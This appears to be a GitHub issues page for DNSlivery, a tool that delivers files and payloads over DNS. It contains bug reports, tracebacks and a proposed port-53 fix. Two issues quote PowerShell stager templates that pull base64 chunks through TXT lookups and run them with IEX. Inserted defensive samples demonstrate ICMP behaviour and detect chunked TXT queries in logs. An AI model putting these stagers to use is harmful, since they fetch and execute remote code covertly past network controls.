
dnslivery's Issues

centos7: dnslivery doesn't listen on UDP port 53

run:

[root@hella DNSlivery]# ./dnslivery.py venet0:0 poc.mydomain.club dnslivery.mydomain.club --verbose -p temp/

DNSlivery - Easy files and payloads delivery over DNS

[*] File "blah.txt" ready for delivery at blah-txt.poc.mydomain.club (1 chunks)
[*] Listening for DNS queries...

netstat:

[root@hella ~]# netstat -anu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
udp        0      0 0.0.0.0:111             0.0.0.0:*  

I'm a scapy newb so I'm not totally familiar, but I'd assume some process needs to bind a UDP socket to listen on for sniff() to do anything, correct?

What does the code on lines 132-138 mean?

    launcher_template = 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{Resolve-DnsName -ty TXT -na "%s.%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}))))'

    stager_templates = {
        'print': '[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
        'exec': 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)}))))',
        'save': '[IO.File]::WriteAllBytes("$(Get-Location)\%s",[System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
    }

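Could you tell me what language these lines are written in, and which keywords I should search for? My English is rather poor, and I can't follow that YouTube video.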

Error Loading

Getting this on launch:
$ sudo python dnslivery.py eth0 -p /tmp/dns-delivery/ -v myevildomain.com ns1.myevildomain.com

DNSlivery - Easy files and payloads delivery over DNS

Traceback (most recent call last):
File "dnslivery.py", line 153, in
if not args.size.isdecimal():
AttributeError: 'str' object has no attribute 'isdecimal'

If I delete all files in the /tmp/dns-delivery/ directory, it will launch but obviously not do anything as there's nothing to serve. Is there a format/syntax that the files need to be in, as it looks like Python is processing them on load and breaking them down into Base64 chunks? For some reason even the simplest "Hello World" text document prevents it from launching for me.
Thanks!

Recommend to Listen on UDP port 53

...
    # listen for DNS query
    log('Listening for DNS queries...')
    udpserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udpserver.bind(('0.0.0.0', 53))  # listen on port 53

    while True: dns_listener = sniff(filter='udp dst port 53', iface=args.interface, prn=dns_handler)

Recommend adding two lines to the code to listen on UDP port 53, because if we don't listen on port 53, the kernel will always reply with a "Destination Unreachable" packet to the client, which will make the data transfer unstable.
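Scapy's sniff() captures packets below the socket layer and binds no port, which is why netstat in the first issue shows nothing on UDP 53 and why the kernel answers with ICMP "Destination Unreachable" as described above. The following is an added example, not DNSlivery code; it assumes Linux-style ICMP error reporting on connected UDP sockets and uses loopback with an ephemeral port in place of port 53.

```python
import socket

LOOPBACK = "127.0.0.1"  # assumption: loopback stands in for the real interface


def icmp_unreachable(bind_listener):
    """Send one datagram to a local UDP port and report whether the kernel
    answered with ICMP port unreachable (surfaced as ConnectionRefusedError).

    bind_listener=False mimics sniff() alone: nothing is bound to the port.
    bind_listener=True mimics the proposed fix: a socket is bound but never read.
    """
    holder = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    holder.bind((LOOPBACK, 0))          # let the OS pick a free port
    port = holder.getsockname()[1]
    if not bind_listener:
        holder.close()                  # port is now closed from the kernel's view

    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(0.5)
    try:
        # A connected UDP socket is what lets the ICMP error reach user space.
        client.connect((LOOPBACK, port))
        client.send(b"query")
        try:
            client.recv(16)
        except ConnectionRefusedError:
            return True                 # kernel sent "port unreachable"
        except socket.timeout:
            return False                # datagram was queued silently, no ICMP
        return False
    finally:
        client.close()
        if bind_listener:
            holder.close()


if __name__ == "__main__":
    print("no socket bound  -> ICMP unreachable:", icmp_unreachable(False))
    print("socket bound     -> ICMP unreachable:", icmp_unreachable(True))
```

On the monitoring side, ICMP port-unreachable replies to DNS queries that are nevertheless followed by DNS answers from the same host indicate a responder that sniffs traffic rather than binding port 53.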

What does the code between 132-138 mean?

    launcher_template = 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{Resolve-DnsName -ty TXT -na "%s.%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}))))'

    stager_templates = {
        'print': '[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
        'exec': 'IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)}))))',
        'save': '[IO.File]::WriteAllBytes("$(Get-Location)\%s",[System.Convert]::FromBase64String((1..%d|%%{do{$error.clear();Write-Host "[*] Resolving chunk $_/%d";Resolve-DnsName -ty TXT -na "%s.$_.%s"|Where-Object Section -eq Answer|Select -Exp Strings}until($error.count-eq0)})))',
    }

I am poor at English, C#, and PowerShell.
I tried to search on Google, but I don't even know which keywords to use. Could you please tell me whether "[System.Text.Encoding]" is C# or PowerShell syntax, and what it means...

Thank you very much.
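The templates quoted above resolve TXT records for names of the form `<name>.<n>.<domain>` (the launcher adds one more label before `<n>`), with `<n>` running from 1 to the chunk count. As an added example, not part of DNSlivery or of this issue, the sketch below flags that query pattern in resolver logs; the log line format, the sample lines and the `min_chunks` threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed resolver log lines, assumed format: "<client> <qtype> <qname>"
SAMPLE_LOG = """\
10.0.0.5 TXT report-txt.1.poc.example.test
10.0.0.5 TXT report-txt.2.poc.example.test
10.0.0.5 TXT report-txt.2.poc.example.test
10.0.0.5 TXT report-txt.3.poc.example.test
10.0.0.5 TXT report-txt.4.poc.example.test
10.0.0.7 A www.example.test
10.0.0.7 TXT _dmarc.example.test
10.0.0.9 TXT selector.2.mail.example.test
"""

# <prefix labels>.<decimal chunk index>.<zone>
CHUNK_RE = re.compile(r"^(?P<name>.+?)\.(?P<idx>\d+)\.(?P<zone>.+)$")


def find_chunked_txt(log_text, min_chunks=3):
    """Return (client, name, zone, chunk_count) for every client that asked
    for TXT records numbered 1..N without gaps under the same name and zone."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1].upper() != "TXT":
            continue
        client, _, qname = parts
        m = CHUNK_RE.match(qname.rstrip(".").lower())
        if m:
            # A set absorbs the repeats produced by the stager's retry loop.
            seen[(client, m["name"], m["zone"])].add(int(m["idx"]))

    hits = []
    for (client, name, zone), idxs in sorted(seen.items()):
        top = max(idxs)
        # Contiguous 1..N run of at least min_chunks indices.
        if top >= min_chunks and idxs == set(range(1, top + 1)):
            hits.append((client, name, zone, top))
    return hits


if __name__ == "__main__":
    for hit in find_chunked_txt(SAMPLE_LOG):
        print("chunked TXT retrieval:", hit)
```

Single-chunk transfers fall below the threshold and need a different signal, such as base64-looking TXT answers from a rarely queried zone.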

error msg

➜  DNSlivery git:(master) ✗ python3.6 dnslivery.py eth0 dnsd.fuy.com vps.fuy.com

DNSlivery - Easy files and payloads delivery over DNS

[*] File "nidaye" ready for delivery at nidaye.dnsd.fuy.com (1 chunks)
[*] File "requirements.txt" ready for delivery at requirements-txt.dnsd.fuy.com (1 chunks)
[*] File "dnslivery.py" ready for delivery at dnslivery-py.dnsd.fuy.com (46 chunks)
[*] File "LICENSE" ready for delivery at license.dnsd.fuy.com (6 chunks)
[*] File "README.md" ready for delivery at readme-md.dnsd.fuy.com (38 chunks)
[*] File ".gitignore" ready for delivery at -gitignore.dnsd.fuy.com (1 chunks)
[*] Listening for DNS queries...

match existing file!
[+] Delivering nidaye print launcher to 58.217.249.133
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 117, in raw
    return bytes(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 441, in __bytes__
    return self.build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 556, in build
    p = self.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 538, in do_build
    pkt = self.self_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 519, in self_build
    p = f.addfield(self, p, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/fields.py", line 134, in addfield
    return s + struct.pack(self.fmt, self.i2m(pkt, val))
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 371, in i2m
    x = len(rdataf.i2m(pkt, pkt.rdata))
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 351, in i2m
    while len(text) >= 255:
TypeError: object of type 'int' has no len()

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 117, in raw
    return bytes(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 441, in __bytes__
    return self.build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 556, in build
    p = self.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 541, in do_build
    pay = self.do_build_payload()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 528, in do_build_payload
    return self.payload.do_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 538, in do_build
    pkt = self.self_build()
  File "/usr/local/lib/python3.6/site-packages/scapy/packet.py", line 519, in self_build
    p = f.addfield(self, p, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/fields.py", line 905, in addfield
    return s + self.i2m(pkt, val)
  File "/usr/local/lib/python3.6/site-packages/scapy/layers/dns.py", line 255, in i2m
    return raw(x)
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 119, in raw
    return bytes(x, encoding="utf8")
TypeError: encoding without a string argument

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "dnslivery.py", line 184, in <module>
    while True: dns_listener = sniff(filter='udp dst port 53', iface=args.interface, prn=dns_handler)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 886, in sniff
    r = prn(p)
  File "dnslivery.py", line 97, in dns_handler
    send(response_pkt, verbose=0, iface=args.interface)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 314, in send
    realtime=realtime, return_packets=return_packets)
  File "/usr/local/lib/python3.6/site-packages/scapy/sendrecv.py", line 287, in __gen_send
    s.send(p)
  File "/usr/local/lib/python3.6/site-packages/scapy/arch/linux.py", line 533, in send
    sx = raw(ll(x))
  File "/usr/local/lib/python3.6/site-packages/scapy/compat.py", line 119, in raw
    return bytes(x, encoding="utf8")
TypeError: encoding without a string argument

file content:

➜  DNSlivery git:(master) ✗ cat nidaye 
zheshizenmehuishi?

win7 or win2008 can't work

It errors in win7 or win2008.
无法将“Resolve-DnsName”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请
检查名称的拼写,如果包括路径,请确保路径正确,然后重试。
https://xbuba.com/questions/51423281
Please, is there any resolution?
